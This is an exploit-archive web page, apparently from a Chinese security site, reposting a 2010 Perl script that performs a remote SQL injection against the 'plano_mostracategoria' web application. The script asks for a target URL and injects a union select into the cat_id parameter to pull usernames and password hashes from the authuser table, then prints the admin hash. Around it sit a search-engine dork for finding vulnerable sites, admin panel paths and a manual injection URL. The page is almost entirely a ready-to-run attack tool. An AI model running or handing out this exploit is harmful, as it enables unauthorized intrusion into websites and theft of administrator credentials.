首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
plano mostracategoria (id) Remote SQL Injection Vulnerability
来源:http://kalashnikov-team.com 作者:kalashnikov 发布时间:2010-09-15  
# Author: [kalashnikov]
# Software Link: [download link if available] / 404
# Tested on: [bk4 r1]
#!/usr/bin/perl -w
# plano mostracategoria (id) Remote SQL Injection Vulnerability
# Author    : kalashnikov
# Site      : http://kalashnikov-team.com + http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {13-9-2010}
# Software  : plano_mostracategoria
# Greetz    : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz
# team      : VoLc4n0 --=-- stone love --=-- fla$h
print "|----------------------------------------------------|\n";
print "|     plano mostracategoria Remote SQL Injector      |\n";
print "|                                                    |\n";
print "| Coded by : kalashnikov                             |\n";
print "| Dork     : inurl:plano_mostracategoria             |\n";
print "|                                                    |\n";
print "| admin cp : /login.php or /vadmin                   |\n";
print "|                                                    |\n";
print "|                  kalashnikov team                  |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nMasukin Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
#Nama Column
$concatenation="concat(uname,char(58),passwd)volc4n0";
#Nama Table
$table="authuser";
$injection="-7+union+select+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !! Check target for details...\n";
print "\n";
print "Attention:\n";
print "VoLc4n0 Palestine hacker -- Jenin \n";
print " !!\n";
print "\n";
}
else{print "\n[-] wah gagal bro (Belom Cebok tangan lo)...\n";
print "\n";
print "\n";
print "localhost/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select+@@version,2,3,4,5,6,7,8--\n";
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NCP Secure Entry Client v.9.23
·win32/xp sp3 (Tr) MessageBoxA
·NCP Secure Client - Juniper Ed
·Ipswitch Imail Server List Mai
·IBM Lotus Domino iCalendar Ema
·MP3 Workstation Version 9.2.1.
·E-Xoopport - Samsara <= v3.1 (
·Integard Pro 2.2.0.9026 (Win7
·Novell iPrint Client Browser P
·win32/xp sp3 (Tr) cmd.exe Shel
·RogiShip Explorer [browser] 1.
·win32/xp sp3 (Tr) Create New F
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved